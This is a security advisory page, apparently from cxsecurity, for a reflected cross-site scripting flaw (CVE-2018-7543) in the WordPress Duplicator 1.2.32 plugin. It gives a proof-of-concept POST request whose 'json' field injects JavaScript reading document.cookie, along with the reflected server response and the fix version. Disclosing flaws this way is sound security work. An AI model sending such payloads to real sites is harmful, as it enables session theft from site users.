WordPress Plugin Duplicator 1.2.32 Cross-Site Scripting

2018.03.16
Credit: Stefan Broeder
Risk: Low
Local: No
Remote: Yes
CVE: CVE-2018-7543
CWE: CWE-79


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

# Exploit Title : Duplicator Wordpress Migration Plugin Reflected Cross Site Scripting (XSS) # Date: 25-02-2018 # Exploit Author : Stefan Broeder # Contact : https://twitter.com/stefanbroeder # Vendor Homepage: https://snapcreek.com/ # Software Link: https://wordpress.org/plugins/duplicator/ # Version: 1.2.32 # CVE : CVE-2018-7543 # Category : webapps Description =========== Duplicator is a wordpress plugin with more than 1 million of active installations. Version 1.2.32 (and possibly previous versionss) are affected by a Reflected XSS vulnerability. Vulnerable part of code ======================= File: duplicator/installer/build/view.step4.php:254 allows direct injection of $_POST variable 'json'. Impact ====== Arbitrary JavaScript code can be run on browser side if a user is tricked to click over a link or browse a URL under the attacker control. Proof of Concept ============ In order to exploit this vulnerability, an attacker has to send the following request to the server: POST /wp-content/plugins/duplicator/installer/build/view.step4.php HTTP/1.1 Host: <hostname> User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: wordpress_5c016e8f0f95f039102cbe8366c5c7f3=wp%7C1518599198<omissis> Connection: close Upgrade-Insecure-Requests: 1 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 91 json='a';};document.write(alert(document.cookie));MyViewModel%3dfunction(){this.status%3d'' The server replies as reported below: HTTP/1.1 200 OK Date: Mon, 12 Feb 2018 14:15:28 GMT Server: Apache/2.4.29 (Debian) Vary: Accept-Encoding Content-Length: 10224 Connection: close Content-Type: text/html; charset=UTF-8 ... <script> MyViewModel = function() { this.status = 'a';};document.write(alert(document.cookie));MyViewModel=function(){this.status=''; var errorCount = this.status.step2.query_errs || 0; (errorCount >= 1 ) ? $('#dup-step3-install-report-count').css('color', '#BE2323') : $('#dup-step3-install-report-count').css('color', '#197713') }; ko.applyBindings(new MyViewModel()); </script> Solution ======== Update to version 1.2.33


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top